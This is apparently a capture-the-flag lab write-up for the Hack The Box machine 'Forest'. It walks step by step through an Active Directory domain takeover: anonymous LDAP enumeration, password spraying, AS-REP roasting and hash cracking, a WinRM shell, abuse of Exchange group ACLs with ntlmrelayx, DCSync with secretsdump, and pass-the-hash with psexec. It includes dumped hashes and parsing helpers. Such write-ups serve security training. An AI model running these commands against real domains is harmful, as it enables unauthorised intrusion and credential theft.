wiki.hackerlab.cz

HTB Forest

Hack the box notes

LDAP 389/TCP - ldapsearch

LDAP usually exposes verbose information about the AD. If the domain controller allows anonymous (NULL) bind, much of that information, such as user and group objects, can be queried without any credentials at all.

Anonymous (NULL) Bind

# ldapsearch null bind
-H   LDAP URI of the DC (ldap://host[:port]; 389/TCP is the default)
-x   simple bind instead of SASL; without -D/-w this is an anonymous (NULL) bind
-s   search scope (base, one, sub)
-b   search base DN (distinguished name), e.g. DC=htb,DC=local

# read the root DSE: AD answers this anonymously even when it refuses other anonymous queries
ldapsearch -H ldap://10.129.95.210 -x -s base
# dump everything below the domain base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"

# Domain password policy (as reported by the enumeration tool)
# No lockout threshold: the password spraying with kerbrute below cannot lock accounts out.
 
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None


# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Remote Management Users

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
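The grep -A 11 above is fragile: ldapsearch folds long values onto continuation lines (a line beginning with a single space continues the previous attribute), so a member or description value can be cut in the middle, and a fixed line count cannot follow nested groups. The script below is an added example, not code from the original notes: it unfolds LDIF, pulls attribute values by DN, and unrolls group membership recursively, which is the same question BloodHound's "Unrolled Group Membership" answers. The LDIF inside it is constructed in the shape of ldapsearch output; only the group names are taken from this page, and the nesting is an assumption made for the demo.

```bash
#!/bin/bash
# Added example, not code from the page. Constructed LDIF in ldapsearch's layout;
# only the group names are taken from the notes above, the nesting is assumed.
SAMPLE_LDIF='dn: CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
objectClass: group
cn: Remote Management Users
description: Members of this group can access WMI resources over management pr
 otocols (such as WS-Management via the Windows Remote Management service).
member: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
sAMAccountName: Remote Management Users

dn: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
objectClass: group
cn: Privileged IT Accounts
member: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
sAMAccountName: Privileged IT Accounts

dn: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
objectClass: group
cn: Service Accounts
member: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: Service Accounts

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: person
cn: svc-alfresco
memberOf: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
sAMAccountName: svc-alfresco
'

# ldif_unfold: LDIF folds long values; a line starting with one space continues
# the previous line. Join them so grep/awk see one attribute per line.
ldif_unfold() {
    awk '
        /^ / { buf = buf substr($0, 2); next }
        { if (NR > 1) print buf; buf = $0 }
        END { print buf }
    '
}

# ldif_attr DN_PREFIX ATTR: values of ATTR for every entry whose dn starts with
# DN_PREFIX (case-insensitive; entries are separated by blank lines).
ldif_attr() {
    local pat
    pat=$(printf 'dn: %s' "$1" | tr 'A-Z' 'a-z')
    ldif_unfold | awk -v pat="$pat" -v attr="$2" '
        /^dn: / { keep = (index(tolower($0), pat) == 1); next }
        /^$/    { keep = 0; next }
        keep && index($0, attr ": ") == 1 { print substr($0, length(attr) + 3) }
    '
}

# group_members GROUP: direct member DNs of GROUP in the sample LDIF.
group_members() {
    printf '%s' "$SAMPLE_LDIF" | ldif_attr "CN=$1," member
}

# unroll_members GROUP: follow nested groups down to the leaf objects, like
# BloodHound's "Unrolled Group Membership".
unroll_members() {
    local m cn
    group_members "$1" | while IFS= read -r m; do
        cn=${m#CN=}; cn=${cn%%,*}
        if [ -n "$(group_members "$cn")" ]; then
            unroll_members "$cn"
        else
            printf '%s\n' "$m"
        fi
    done
}

# Who can actually use WinRM through the Remote Management Users group?
unroll_members 'Remote Management Users'
```

Against a live DC, pipe the real ldapsearch output into ldif_attr instead of the sample, or avoid the folding problem at the source with ldapsearch -o ldif-wrap=no.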

Windapsearch

# install (python-ldap is compiled against the SASL/LDAP headers, so install those first)
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl2-dev libldap2-dev libssl-dev python3-dev
pip install python-ldap
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"

Kerberos - 88/TCP

kerbrute

Brute force and enumerate valid AD accounts with kerbrute. The KDC's replies reveal whether a username exists, and an account that answers with an AS-REP without pre-authentication (svc-alfresco in the output below) is a candidate for AS-REP roasting.

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >   10.129.95.210:88

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds


Kerberoasting

Kerberoasting requests TGS tickets for accounts that have a Service Principal Name (SPN) set and cracks them offline. Identify the SPNs tied to accounts with Impacket's GetUserSPNs (valid domain credentials are needed):

# list SPNs tied to accounts
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# request the TGS tickets to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request

On Forest there is no valid password yet, but kerbrute showed that svc-alfresco does not require Kerberos pre-authentication, so its AS-REP can be requested without any credentials (AS-REP roasting). The response contains an encrypted blob that can be cracked offline with hashcat or john:
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1

Hashcat - Cracking Kerberos ticket

# $krb5asrep$23$ is an AS-REP hash: mode 18200. Mode 13100 is for $krb5tgs$23$ Kerberoast hashes.
hashcat -m 18200 -a 0 svc_hash passwordlist.txt
# --show only prints what is already cracked in the potfile, so run it as a separate step
hashcat -m 18200 svc_hash --show

John The Ripper - Cracking Kerberos ticket (the $krb5asrep$ prefix is detected automatically)

john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 
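The mix-up above (an AS-REP hash fed to the Kerberoast mode) is easy to make, and the wrong mode silently cracks nothing. The helper below is an added example, not code from the original notes: it reads an Impacket hash line, tells the two formats apart, picks the hashcat mode and john format, and sanity-checks the RC4 checksum length, which catches a hash that was truncated when pasted into a file. The hash strings in the block are constructed test inputs, not real tickets.

```bash
#!/bin/bash
# Added example, not code from the page. Maps an Impacket Kerberos hash line to
# the hashcat mode / john format that cracks it. Test strings are constructed.
SAMPLE_ASREP='$krb5asrep$23$svc-alfresco@HTB.LOCAL:00112233445566778899aabbccddeeff$0011aabb'
SAMPLE_TGS='$krb5tgs$23$*sqlsvc$HTB.LOCAL$MSSQLSvc/db.htb.local:1433*$00112233445566778899aabbccddeeff$0011aabb'

# kerb_hash_mode HASH: prints "<hashcat mode> <john format> <user@REALM>".
# Field layouts (split on '$') as Impacket writes them:
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>          (GetNPUsers)
#   $krb5tgs$<etype>$*<user>$<REALM>$<spn>*$<checksum>$<edata>      (GetUserSPNs)
kerb_hash_mode() {
    local h=$1 kind etype f4 f5 principal checksum mode fmt
    case $h in
        '$krb5asrep$'*) kind=asrep ;;
        '$krb5tgs$'*)   kind=tgs ;;
        *) echo "not an Impacket krb5asrep/krb5tgs hash" >&2; return 1 ;;
    esac
    etype=$(printf '%s\n' "$h" | cut -d'$' -f3)
    f4=$(printf '%s\n' "$h" | cut -d'$' -f4)
    if [ "$kind" = asrep ]; then
        principal=${f4%%:*}
        checksum=${f4#*:}
    else
        f5=$(printf '%s\n' "$h" | cut -d'$' -f5)
        principal="${f4#\*}@$f5"
        checksum=$(printf '%s\n' "$h" | cut -d'$' -f7)
    fi
    case "$kind/$etype" in
        asrep/23) mode=18200; fmt=krb5asrep ;;   # AS-REP, RC4-HMAC
        tgs/23)   mode=13100; fmt=krb5tgs ;;     # TGS-REP, RC4-HMAC (Kerberoast)
        tgs/17)   mode=19600; fmt=krb5tgs ;;     # TGS-REP, AES128
        tgs/18)   mode=19700; fmt=krb5tgs ;;     # TGS-REP, AES256
        *) echo "etype $etype for $kind is not handled by this helper" >&2; return 2 ;;
    esac
    # RC4 hashes carry a 16-byte HMAC checksum = 32 hex chars; anything else
    # means the line was truncated or mangled when it was copied into a file.
    if [ "$etype" = 23 ] && [ "${#checksum}" -ne 32 ]; then
        echo "checksum is ${#checksum} hex chars, expected 32: damaged hash?" >&2
        return 3
    fi
    printf '%s %s %s\n' "$mode" "$fmt" "$principal"
}

# crack_cmd HASHFILE WORDLIST: the hashcat command for the hash on HASHFILE's first line.
crack_cmd() {
    local info
    info=$(kerb_hash_mode "$(head -n 1 "$1")") || return 1
    printf 'hashcat -m %s -a 0 %s %s\n' "${info%% *}" "$1" "$2"
}

kerb_hash_mode "$SAMPLE_ASREP"
kerb_hash_mode "$SAMPLE_TGS"
```

Run crack_cmd svc_hash /usr/share/wordlists/rockyou.txt against the file saved above to get the right hashcat line; john needs no mode because it reads the prefix itself.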

Crackmapexec - Test login to account

crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice

WinRM

WinRM (5985/TCP, 5986/TCP with TLS) is Microsoft's implementation of the WS-Management protocol and gives a remote PowerShell session. Besides administrators, members of the builtin "Remote Management Users" group (directly or through nested groups) are allowed to connect, so look for that group and what it contains:

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1

Evil-WinRM

git clone https://github.com/Hackplayers/evil-winrm

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice
net group /domain

DCSync attack through the Exchange Trusted Subsystem group

svc-alfresco is a member of "Account Operators" (see the BloodHound section below), which can create users and add them to most non-protected groups, including "Exchange Trusted Subsystem". In a default Exchange installation that group is nested in "Exchange Windows Permissions", which holds WriteDACL on the domain object, so a member can grant itself the replication rights (DS-Replication-Get-Changes and -All) that a DCSync needs. The Fox-IT post linked at the bottom explains the ACL chain.

Create domain account

From the evil-winrm shell as svc-alfresco (Account Operators), create a user and put it into the Exchange group:

PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain

Impacket NTLM Relay

Impacket's ntlmrelayx.py performs NTLM relay attacks: it starts SMB and HTTP listeners and relays incoming authentication to other protocols (SMB, HTTP, LDAP, etc.). With --escalate-user it relays to LDAP on the DC and, using the relayed account's WriteDACL on the domain, grants DCSync (replication) rights to the named user. Nothing happens until bigb0ss actually authenticates to the listener (for example by opening a share or URL on the Kali host from the Windows shell); that trigger is not shown here.

# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss

DCSync attack - Dump Administrator LM/NT hash

# kali terminal2 (either invocation; the second is the Kali package's wrapper script)
secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

PSEXEC - Login as administrator using hash

# pass the hash as LM:NT exactly as dumped; the LM half is the empty-password placeholder
impacket-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
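Copying the hash out of the secretsdump output by hand is where the LM/NT halves get swapped or a Kerberos key line gets picked up by mistake. The helper below is an added example, not code from the original notes: it parses secretsdump's domain\user:rid:lmhash:nthash::: lines, skips the Kerberos key lines, returns the LM:NT value for one account, and flags the empty-LM placeholder. The dump text in the block is constructed in secretsdump's layout with a made-up NT hash.

```bash
#!/bin/bash
# Added example, not code from the page. Constructed secretsdump output with a
# made-up NT hash; the layout is domain\user:rid:lmhash:nthash:::
SAMPLE_DUMP='[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
[*] Cleaning up...'

# LM hash of an empty password; seen whenever LM storage is disabled (the default).
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee

# dump_hashes USER: read secretsdump output on stdin, print "LM:NT" for USER
# (case-insensitive, domain prefix ignored); fails if no hash line matches.
dump_hashes() {
    awk -F: -v user="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        NF >= 6 && $2 ~ /^[0-9]+$/ {           # numeric RID: a hash line, not a Kerberos key line
            acct = $1; sub(/.*\\/, "", acct)   # drop the DOMAIN\ prefix
            if (tolower(acct) == user &&
                length($3) == 32 && $3 ~ /^[0-9a-f]+$/ &&
                length($4) == 32 && $4 ~ /^[0-9a-f]+$/) {
                print $3 ":" $4; found = 1; exit
            }
        }
        END { exit found ? 0 : 1 }'
}

# pth_args USER: the value to pass to impacket -hashes, taken from the sample dump.
pth_args() {
    printf '%s\n' "$SAMPLE_DUMP" | dump_hashes "$1"
}

# nt_hash USER: only the NT half, with a note when the LM half is the empty placeholder.
nt_hash() {
    local lmnt
    lmnt=$(pth_args "$1") || return 1
    [ "${lmnt%%:*}" = "$EMPTY_LM" ] && echo "note: LM half is the empty-password hash" >&2
    printf '%s\n' "${lmnt#*:}"
}

printf 'impacket-psexec htb.local/administrator@<DC-IP> -hashes %s\n' "$(pth_args Administrator)"
```

With a real dump, replace the sample with the file secretsdump wrote (or pipe its stdout into dump_hashes).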

The BloodHound analysis below is how the path from svc-alfresco (Account Operators) to DCSync rights was found in the first place.

BloodHound Kali - ingestor based on impacket

Python-based ingestor built on impacket. Either install the package (which provides the bloodhound-python command) or run bloodhound.py from the cloned repository.

pip install impacket
pip install ldap3
pip install bloodhound

git clone https://github.com/fox-it/BloodHound.py.git

# add -c all to run every collection method instead of the default set
./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210

BloodHound and Neo4j

Initial setup

apt install bloodhound
apt install neo4j

neo4j console

Start the neo4j console and, on first use, open http://localhost:7474 to change the database password (the default login is neo4j/neo4j); BloodHound then connects with that password.

Start

./BloodHound --no-sandbox

Import data (upload icon)

Mark svc-alfresco as owned

Click on svc-alfresco and choose "Unrolled Group Membership"

We can see the user is, through nested groups, a member of "Account Operators". Members of this group can create and modify most types of accounts and add them to non-protected groups.

To abuse the "Account Operators" privileges (see the DCSync section above), the privilege escalation continues by creating a new domain user and running a DCSync attack with it.

Last updated 1 year ago

Links
GitHub - ropnop/windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
Releases · ropnop/kerbrute
Escalating privileges with ACLs in Active Directory (Fox-IT International blog)
GitHub - fox-it/BloodHound.py: A Python based ingestor for BloodHound